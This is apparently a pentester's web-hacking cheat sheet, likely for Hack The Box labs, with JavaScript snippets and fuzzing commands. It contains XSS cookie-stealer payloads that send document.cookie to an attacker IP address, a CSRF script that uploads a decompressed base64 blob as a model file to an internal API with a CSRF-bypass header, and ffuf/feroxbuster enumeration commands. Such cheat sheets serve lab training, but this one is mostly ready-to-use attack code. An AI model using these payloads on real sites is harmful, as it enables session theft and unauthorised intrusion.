Web

Javascript

Fetch alternative for POST

https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon

const url = 'https://example.com/log';
const data = 'type=text&title=test&text=letmein';

const success = navigator.sendBeacon(url, data);
if (success) { console.log('Data sent successfully.'); } 
else { console.error('Failed to send data.'); }
const url = 'https://example.com/log';
const formData = new FormData();
formData.append('type', 'text');
formData.append('title', 'test');
formData.append('text', 'letmein');

const success = navigator.sendBeacon(url, formData);
if (success) { console.log('Data sent successfully.'); } 
else { console.error('Failed to send data.'); }

Get all functions

Object.keys(window).forEach((key, index) => {
  if (typeof window[key] === 'function') {
    console.log(`${index}: ${key}`);
  }
});
Object.keys(window).forEach((key, index)=>{if(typeof window[key]==='function'){console.log(`${index}: ${key}`);}});

Dump function code via console

> functioName.toString()
...code...

Example

Obfuscated code:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}',24,24,'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|'),0,{}))

Deobfuscated:

> makeInviteCode.toString()
`function makeInviteCode(){$.ajax({type:"POST",dataType:"json",url:'/api/v1/invite/how/to/generate',success:function(response){console.log(response)},error:function(response){console.log(response)}})}`

Sometimesworks, sometimes not; Depends on obfuscator (?)

Get HTB Sherlock Questions

var t='';document.querySelectorAll('.markdown-section p').forEach((e, i) => t+=`### Task ${i+1}. ${e.textContent}<br><br><br>`);document.write(t);

CSRF form to upload a gzip compressed base64 blob

async function DecompressBlob(blob) {
  const ds = new DecompressionStream("gzip");
  const decompressedStream = blob.stream().pipeThrough(ds);
  return await new Response(decompressedStream).blob();
}

function uploadFile(file) {
  const reader = new FileReader();

  reader.onload = function(event) {
    const blob = new Blob([event.target.result], { type: file.type });
    const formData = new FormData();
    formData.append('file', blob, file.name); 
    fetch('/api/internal/model', {
      method: 'POST',
      body: formData,
      headers: { "X-SPACE-NO-CSRF": "1" }
    })
    .then(data => console.log('File uploaded successfully:', data))
    .catch(error => console.error('Error uploading file:', error));
  };
  reader.readAsArrayBuffer(file);
}

const base64GzipString = "H4sICEOM....==";
let bytes = Uint8Array.from(atob(base64GzipString), c => c.charCodeAt(0));
let blob = new Blob([bytes], { type: "application/gzip" });
let data = await DecompressBlob(blob);

// console.log(Array.from(new Uint8Array(await dec.arrayBuffer())).map(byte => byte.toString(16).padStart(2, '0')).join(' '));

const file = new File([data], "example.h5", { type: "text/plain" });
uploadFile(file);

Cookie Stealer

<!-- Silent One-Liner -->
<script>var i=new Image;i.src="http://10.10.14.113/?"+document.cookie;</script>

<!-- <img> Tag Instead of <script> Tags -->
<img src=x onerror=this.src='http://10.10.14.113/?'+document.cookie;>

<!-- <img> Tag and Without the Infinite Loop -->
<img src=x onerror="this.src='http://10.10.14.113/?'+document.cookie; this.removeAttribute('onerror');">

(VHost) Domain fuzzing

# HTTP
domain='domain.tld'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl CHANGE_FOR_COMMON_LINE_NUMBER

# HTTPs
domain='domain.tld'; ffuf -k -u "https://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl CHANGE_FOR_COMMON_LINE_NUMBER

FeroxBuster

# HTTP
feroxbuster -u 'http://domain.tld/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
feroxbuster -u 'http://domain.tld/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34

# HTTPs
feroxbuster -u 'https://domain.tld/' -k -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34
feroxbuster -u 'https://domain.tld/' -k -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34
PreviousLinuxNextWindows

Last updated